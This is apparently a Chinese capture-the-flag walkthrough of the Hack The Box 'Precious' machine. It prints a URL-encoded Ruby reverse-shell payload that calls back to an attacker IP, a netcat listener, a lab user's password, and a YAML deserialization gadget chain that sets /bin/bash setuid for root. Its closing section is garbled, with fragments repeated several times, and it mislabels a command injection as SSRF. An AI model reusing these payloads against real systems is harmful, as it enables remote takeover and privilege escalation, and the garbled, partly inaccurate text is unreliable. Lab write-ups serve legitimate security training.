HTB Precious 靶机渗透测试详细教程<\/h1>

1. 信息收集阶段<\/h2>

1.1 端口扫描<\/h3>

使用nmap进行初始扫描：<\/p>

nmap -sV -sC -oA nmap\/initial 10.10.11.189
<\/span><\/span><\/code><\/pre>1.2 Web服务发现<\/h3>

访问IP地址时发现重定向到一个域名<\/li>
将域名添加到hosts文件：<\/li>
<\/ul>
echo "10.10.11.189 precious.htb"<\/span> | sudo tee -a \/etc\/hosts
<\/span><\/span><\/code><\/pre>2. Web应用分析<\/h2>
2.1 发现漏洞组件<\/h3>
通过抓包分析发现服务器使用了wkhtmltopdf 0.12.6<\/code>，该版本存在SSRF漏洞。<\/p>
2.2 进一步发现<\/h3>
在返回包中发现使用了pdfkit<\/code>组件，这是一个Ruby库，用于HTML转PDF。<\/p>
3. 漏洞利用<\/h2>
3.1 SSRF漏洞利用<\/h3>
使用Burp Repeater模块构造恶意请求：<\/p>
POST<\/span> \/ HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> precious.htb<\/span>
<\/span><\/span>User-Agent:<\/span> Mozilla\/5.0 (X11; Linux x86_64; rv:128.0) Gecko\/20100101 Firefox\/128.0<\/span>
<\/span><\/span>Accept:<\/span> text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/png,image\/svg+xml,*\/*;q=0.8<\/span>
<\/span><\/span>Accept-Language:<\/span> en-US,en;q=0.5<\/span>
<\/span><\/span>Accept-Encoding:<\/span> gzip, deflate, br<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>Content-Length:<\/span> 182<\/span>
<\/span><\/span>Origin:<\/span> http:\/\/precious.htb<\/span>
<\/span><\/span>Connection:<\/span> close<\/span>
<\/span><\/span>Referer:<\/span> http:\/\/precious.htb\/<\/span>
<\/span><\/span>Upgrade-Insecure-Requests:<\/span> 1<\/span>
<\/span><\/span>Priority:<\/span> u=0, i<\/span>
<\/span><\/span>
<\/span><\/span>url=http%3A%2F%2F10.10.16.22%3A4444%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%2210.10.16.22%22%2C4444%29%27%60
<\/span><\/span><\/code><\/pre>3.2 反向Shell获取<\/h3>
在攻击机上设置监听：<\/p>
nc -lvnp 4444<\/span>
<\/span><\/span><\/code><\/pre>4. 权限提升<\/h2>
4.1 发现用户凭证<\/h3>
在\/home\/.bundle<\/code>目录下发现用户henry的密码：<\/p>
henry:Q3c1AqGHtoI0aXAYFH
<\/code><\/pre>
4.2 检查sudo权限<\/h3>
sudo -l
<\/span><\/span><\/code><\/pre>输出显示可以使用root权限运行ruby脚本：<\/p>
(root) NOPASSWD: \/usr\/bin\/ruby \/opt\/update_dependencies.yml
<\/code><\/pre>
4.3 分析目标脚本<\/h3>
发现脚本使用相对路径加载dependencies.yml<\/code>文件，存在路径劫持漏洞。<\/p>
4.4 创建恶意YAML文件<\/h3>
在当前目录创建dependencies.yml<\/code>文件，内容为：<\/p>
---
<\/span><\/span>- !ruby\/object:Gem::Installer<\/span>
<\/span><\/span>    i<\/span>: x<\/span>
<\/span><\/span>- !ruby\/object:Gem::SpecFetcher<\/span>
<\/span><\/span>    i<\/span>: y<\/span>
<\/span><\/span>- !ruby\/object:Gem::Requirement<\/span>
<\/span><\/span>  requirements<\/span>:
<\/span><\/span>    !ruby\/object:Gem::Package::TarReader<\/span>
<\/span><\/span>    io<\/span>: &1<\/span> !ruby\/object:Net::BufferedIO<\/span>
<\/span><\/span>      io<\/span>: &1<\/span> !ruby\/object:Gem::Package::TarReader::Entry<\/span>
<\/span><\/span>         read<\/span>: 0<\/span>
<\/span><\/span>         header<\/span>: "abc"<\/span>
<\/span><\/span>      debug_output<\/span>: &1<\/span> !ruby\/object:Net::WriteAdapter<\/span>
<\/span><\/span>         socket<\/span>: !ruby\/object:Gem::RequestSet<\/span>
<\/span><\/span>             sets<\/span>: !ruby\/object:Net::WriteAdapter<\/span>
<\/span><\/span>                 socket<\/span>: !ruby\/module 'Kernel'<\/span>
<\/span><\/span>                 method_id<\/span>: :system<\/span>
<\/span><\/span>             git_set<\/span>: chmod +s \/bin\/bash<\/span>
<\/span><\/span>         method_id<\/span>: :resolve<\/span>
<\/span><\/span><\/code><\/pre>4.5 执行提权<\/h3>
sudo \/usr\/bin\/ruby \/opt\/update_dependencies.yml
<\/span><\/span><\/code><\/pre>4.6 获取root权限<\/h3>
\/bin\/bash -p
<\/span><\/span><\/code><\/pre>5. 总结<\/h2>

通过nmap扫描发现Web服务<\/li>
发现wkhtmltopdf和pdfkit组件的SSRF漏洞<\/li>
利用SSRF漏洞获取反向Shell<\/li>
在系统中发现用户凭证<\/li>
利用sudo权限配置不当实现提权<\/li>
<\/ol>
关键点<\/strong>：<\/p>

wkhtmltopdf 0.12.6的SSRF漏洞<\/li>
pdfkit的远程代码执行<\/li>
Ruby YAML反序列化漏洞<\/li>
sudo权限配置不当导致的提权<\/li>
<\/ul>

HTB Precious 靶机渗透测试详细教程<\/h1>

1. 信息收集阶段<\/h2>

2. Web应用分析<\/h2>

2.1 发现漏洞组件<\/h3>
通过抓包分析发现服务器使用了`wkhtmltopdf 0.12.6<\/code>，该版本存在SSRF漏洞。<\/p>`

4. 权限提升<\/h2>

4.3 分析目标脚本<\/h3>
发现脚本使用相对路径加载`dependencies.yml<\/code>文件，存在路径劫持漏洞。<\/p>`

HTB Precious 靶机渗透测试详细教程<\/h1>

1. 信息收集阶段<\/h2>

2. Web应用分析<\/h2>

2.1 发现漏洞组件<\/h3> 通过抓包分析发现服务器使用了wkhtmltopdf 0.12.6<\/code>，该版本存在SSRF漏洞。<\/p>

4. 权限提升<\/h2>

4.3 分析目标脚本<\/h3> 发现脚本使用相对路径加载dependencies.yml<\/code>文件，存在路径劫持漏洞。<\/p>

2.1 发现漏洞组件<\/h3>
通过抓包分析发现服务器使用了`wkhtmltopdf 0.12.6<\/code>，该版本存在SSRF漏洞。<\/p>`

4.3 分析目标脚本<\/h3>
发现脚本使用相对路径加载`dependencies.yml<\/code>文件，存在路径劫持漏洞。<\/p>`